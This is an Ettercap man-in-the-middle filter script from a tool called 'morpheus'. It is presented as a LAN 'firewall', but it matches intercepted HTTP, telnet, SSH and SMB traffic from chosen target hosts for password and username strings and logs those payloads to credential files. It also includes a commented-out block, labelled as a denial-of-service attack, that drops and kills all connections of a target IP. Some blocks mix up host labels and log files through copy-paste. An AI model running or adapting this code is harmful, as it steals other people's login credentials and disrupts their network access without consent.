############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
#  This filter will act like a firewall reporting OR blocking
#  connections inside Local Lan of the sellected ip address.
#  It also dumps to a [ logfile_creds ] logins captured under
#  mitm + filter execution In services: http,ssh,telnet,ftp...  
##




#########################################################
## target [ 1 ] connections to filter trougth morpheus ##
#########################################################
##
# [ from ME -> OUTSIDE ]
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:80 http ☆");
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./http_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./http_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./http_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 23) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:23 telnet ☆");
        # log credentials into morpheus/logs/telnet_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./telnet_creds");
         msg("\n[morpheus] host:TaRONE   [ ♛ ]");
         msg("[morpheus] | status: login detected!");
         msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 22) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:22 ssh ☆");
        # log credentials into morpheus/logs/ssh_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./ssh_creds");
         msg("\n[morpheus] host:TaRONE   [ ♛ ]");
         msg("[morpheus] | status: login detected!");
         msg("[morpheus] |_ info : credentials found, logfile stored...\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./ssh_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./ssh_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
#
# [ REPORTING VENOM/METASPLOIT POSSIBLE RAT PORT AGENTS ]...
#
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 666) {
  msg("\n[morpheus] host:TaRONE   [ ♛ ]  port:666 rat ☠");
  msg("[morpheus] | status: possible rat agent found!");
  msg("[morpheus] |  info : venom tool uses this port in is rat agents.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 666 --script vuln TaRONE\n");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 4444) {
  msg("\n[morpheus] host:TaRONE   [ ♛ ]  port:4444 rat ☠");
  msg("[morpheus] | status: possible rat agent found!");
  msg("[morpheus] |  info : metasploit uses this port in is rat agents.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 4444 --script vuln TaRONE\n");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 3389) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:3389 rdp ☆");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 443) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:443 https ☆");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 445) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:445 netbios ☠");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 139) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:139 netbios ☠");
}
if (ip.src == 'TaRONE' && ip.proto == UDP && udp.dst == 137) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:137 netbios ☠");
}
#
# IF YOU DONT WANT MANY DISPLAY OUTPUTS IN TERMINAL(very verbose)
# THEN YOU NEED TO COMMENT (#) THIS ENTIRE FUNTION.
# IF YOU WANT TO BE PARANOIC, THEN LEAVE THIS FUNTION AS IT IS...
# AND BE PREPARED TO DEAL WITH MANY PORT:53 TERMINAL OUTPUTS.
#
#
if (ip.src == 'TaRONE' && ip.proto == UDP && tcp.dst == 53) {
  msg("[morpheus] host:TaRONE   [ -> ]  port:53 dns ☆");
        if (search(DATA.data, "facebook")) {
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: possible facebook dns query found!");
          msg("[morpheus] |  info : normal connection from source!");
          msg("[morpheus] |  hex  : 65 64 67 65 2d 63 68 61 74 08 66 61 63 65 62 6f 6f 6b 03 6f 6d");
          msg("[morpheus] |_ decoded: edge-chat.facebook.com\n");
        }else{
        if (search(DATA.data, "arpa")) {
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: possible arpa dns query found!");
          msg("[morpheus] |  info : normal connection? OR arp poison query?");
          msg("[morpheus] |  hex  : 64 64 62 04 61 72 70 61");
          msg("[morpheus] |_ decoded: ddr.arpa\n");
        }
        }
}
# END OF PORT:53 QUERY FUNTION 






###
# [ from OUTSIDE -> ME ]
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 80) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:80 http ☆");
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 445) {
  msg("\n[morpheus] host:TaRONE   [ <- ]  port:445 netbios ☠");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by netapi vulnerability.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 445 --script vuln TaRONE\n");
        # log credentials into morpheus/logs/smb_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./smb_creds");
          msg("[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 23) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:23 telnet ☠");
        # log credentials into morpheus/logs/telnet_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("\n[morpheus] host:TaRONE   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 22) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:22 ssh ☆");
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 443) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:443 https ☆");
}
if (ip.dst == 'TaRONE' && ip.proto == UDP && udp.src == 137) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:137 netbios ☠");
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 139) {
  msg("[morpheus] host:TaRONE   [ <- ]  port:139 netbios ☠");
}
#
# [ REPORTING VENOM/METASPLOIT POSSIBLE RAT AGENTS ]...
#
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 666) {
  msg("\n[morpheus] host:TaRONE   [ ♛ ]  port:666 rat ☠");
  msg("[morpheus] | status: possible rat agent found!");
  msg("[morpheus] |  info : venom tool uses this port in is rat agents.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 666 --script vuln TaRONE\n");
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 4444) {
  msg("\n[morpheus] host:TaRONE   [ ♛ ]  port:4444 rat ☠");
  msg("[morpheus] | status: possible rat agent found!");
  msg("[morpheus] |  info : metasploit uses this port in is rat agents.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 4444 --script vuln TaRONE\n");
}
if (ip.dst == 'TaRONE' && ip.proto == TCP && tcp.src == 3389) {
  msg("\n[morpheus] host:TaRONE   [ <- ]  port:3389 rdp ☠");
  msg("[morpheus] | status: remote desktop protocol connection!");
  msg("[morpheus] |  info : rdp protocol its commonly used by hackers.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 3389 --script vuln TaRONE\n");
}






#########################################################
## target [ 2 ] connections to filter trougth morpheus ##
#########################################################
##
# from TARGET2 -> OUTSIDE
if (ip.src == 'TaRTWO' && ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:80 http ☆");
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./http_creds");
         msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
         msg("[morpheus] | status: login detected!");
         msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./http_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./http_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.src == 'TaRTWO' && ip.proto == TCP && tcp.dst == 443) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:443 https ☆");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 445) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:445 netbios ☠");
}
if (ip.src == 'TaRTWO' && ip.proto == TCP && tcp.dst == 139) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:139 netbios ☆");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 22) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:22 ssh ☠");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 23) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:23 telnet ☠");
}
if (ip.src == 'TaRONE' && ip.proto == TCP && tcp.dst == 21) {
  msg("[morpheus] host:TaRTWO   [ -> ]  port:21 ftp ☠");
}



##
# from OUTSIDE ->  TARGET2
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 80) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:80 http ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 443) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:443 https ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 445) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:445 smb ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 139) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:139 netbios ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 22) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:22 ssh ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 23) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:23 telnet ☆");
}
if (ip.dst == 'TaRTWO' && ip.proto == TCP && tcp.src == 21) {
  msg("[morpheus] host:TaRTWO   [ <- ]  port:21 ftp ☆");
}




#########################################################
##          gateway 192.168.1.253 connections          ##
#########################################################
##
# from GATEWAY -> OUTSIDE
if (ip.src == '192.168.1.253' && ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:192.168.1.253  [ -> ]  port:80 http ☆");
}
if (ip.src == '192.168.1.253' && ip.proto == UDP && udp.dst == 53) {
  msg("[morpheus] host:192.168.1.253  [ -> ]  port:53 domain ☆");
}
if (ip.src == '192.168.1.253' && ip.proto == TCP && tcp.dst == 443) {
  msg("[morpheus] host:192.168.1.253  [ -> ]  port:443 https ☆");
}
if (ip.src == '192.168.1.253' && ip.proto == TCP && tcp.dst == 445) {
  msg("[morpheus] host:192.168.1.253  [ -> ]  port:445 netbios ☠");
}
if (ip.src == '192.168.1.253' && ip.proto == TCP && tcp.dst == 139) {
  msg("[morpheus] host:192.168.1.253  [ -> ]  port:139 netbios ☠");
        # log credentials into morpheus/logs/smb_creds
        if (regex(DECODED.data, ".*user.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*USER.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*USERNAME.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}



##
# from OUTSIDE -> GATEWAY
if (ip.dst == '192.168.1.253' && ip.proto == TCP && tcp.src == 80) {
  msg("[morpheus] host:192.168.1.253  [ <- ]  port:80 http ☆");
}
if (ip.dst == '192.168.1.253' && ip.proto == TCP && tcp.src == 443) {
  msg("[morpheus] host:192.168.1.253  [ <- ]  port:443 https ☆");
}
if (ip.dst == '192.168.1.253' && ip.proto == TCP && tcp.src == 445) {
  msg("[morpheus] host:192.168.1.253  [ <- ]  port:445 netbios ☠");
}
if (ip.dst == '192.168.1.253' && ip.proto == TCP && tcp.src == 139) {
  msg("[morpheus] host:192.168.1.253  [ <- ]  port:139 netbios ☠");
}
if (ip.dst == '192.168.1.253' && ip.proto == UDP && udp.src == 53) {
  msg("[morpheus] host:192.168.1.253  [ <- ]  port:53 domain ☆");
}




#########################################################
##           modem 192.168.1.254 connections           ##
#########################################################
##
# from MODEM -> OUTSIDE
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 80) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:80 http ☆");
}
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 443) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:443 https ☆");
}
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 139) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:139 netbios ☠");
}
if (ip.src == '192.168.1.254' && ip.proto == UDP && udp.dst == 53) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:53 domain ☆");
}
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 23) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:23 telnet ☆");
}
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 22) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:22 ssh ☆");
}
if (ip.src == '192.168.1.254' && ip.proto == TCP && tcp.dst == 21) {
  msg("[morpheus] host:192.168.1.254  [ -> ]  port:21 ftp ☆");
}



##
# from OUTSIDE -> MODEM
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 80) {
  msg("[morpheus] host:192.168.1.254  [ <- ]  port:80 http ☆");
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 443) {
  msg("[morpheus] host:192.168.1.254  [ <- ]  port:443 https ☆");
}
if (ip.dst == '192.168.1.254' && ip.proto == UDP && udp.src == 53) {
  msg("[morpheus] host:192.168.1.254  [ <- ]  port:53 domain ☆");
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 445) {
  msg("\n[morpheus] host:192.168.1.254  [ <- ]  port:445 netbios ☠");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by netapi vulnerability.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 445 --script vuln 192.168.1.254\n");
        # log credentials into morpheus/logs/smb_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./smb_creds");
          msg("[morpheus] host:192.168.1.254   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 139) {
  msg("\n[morpheus] host:192.168.1.254  [ <- ]  port:139 netbios ☠");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by netapi vulnerability.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 139 --script vuln 192.168.1.254\n");
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 23) {
  msg("\n[morpheus] host:192.168.1.254  [ <- ]  port:23 telnet ☠");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by telnet connections.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 23 --script vuln 192.168.1.254\n");
        # log credentials into morpheus/logs/telnet_creds
        if (regex(DECODED.data, ".*password.*")) {
         log(DECODED.data, "./telnet_creds");
          msg("[morpheus] host:192.168.1.254   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASSWORD.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }else{
        # log credentials into morpheus/logs/http_creds
        if (regex(DECODED.data, ".*PASS.*")) {
         log(DECODED.data, "./smb_creds");
          msg("\n[morpheus] host:TaRTWO   [ ♛ ]");
          msg("[morpheus] | status: login detected!");
          msg("[morpheus] |_ info : credentials found, logfile stored ✔\n");
        }
        }
        }
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 22) {
  msg("\n[morpheus] host:192.168.1.254  [ <- ]  port:22 ssh ☆");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by ssh connections.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 22 --script vuln 192.168.1.254\n");
}
if (ip.dst == '192.168.1.254' && ip.proto == TCP && tcp.src == 21) {
  msg("\n[morpheus] host:192.168.1.254  [ <- ]  port:21 ftp ☠");
  msg("[morpheus] | status: remote connection detected!");
  msg("[morpheus] |  info : port used by ftp connections.");
  msg("[morpheus] |_ advice: nmap -sV -PN -p 21--script vuln 192.168.1.254\n");
}







#########################################################
##         DENIAL-OF-SERVICE ATTACK (drop,kill)        ##
#########################################################
##
# drop packet | kill connection ...
# "un-comment" this funtion to filter any tcp/udp connections
# made to OR from target ip addr (perform D0S againts ip addr)
# "remmenber to change this ip addr for your target ip addr".
#
#if (ip.src == '192.168.1.95' || ip.dst == '192.168.1.95') {
# msg("\n[morpheus] host:192.168.1.95   [ ♛ ]");
# msg("[morpheus] | status: block connection!");
# msg("[morpheus] |  info : drop target tcp/udp packet ✔");
# msg("[morpheus] |_ info : kill target tcp/udp connection ✔\n");
# drop();
# drop();
#kill();
#kill();
#}



##
# drop packet | kill IPv6 connection ...
# "un-comment" this funtion to filter any tcp/udp connections
# made to OR from target ipv6 addr (perform D0S againts ipv6 addr)
# "remmenber to change this ipv6 addr for your target ipv6 addr".
#
#if (eth.proto == IP6 && ipv6.src == 'fe80::4b15:11c8:f426:205f' || ipv6.dst == 'fe80::4b15:11c8:f426:205f') {
# msg("\n[morpheus] host:fe80::4b15..   [ ♛ ]");
# msg("[morpheus] | status: block connection!");
# msg("[morpheus] |  info : drop target IPv6 tcp/udp packet ✔");
# msg("[morpheus] |_ info : kill target IPv6 connection ✔\n");
# drop();
# drop();
#kill();
#kill();
#}
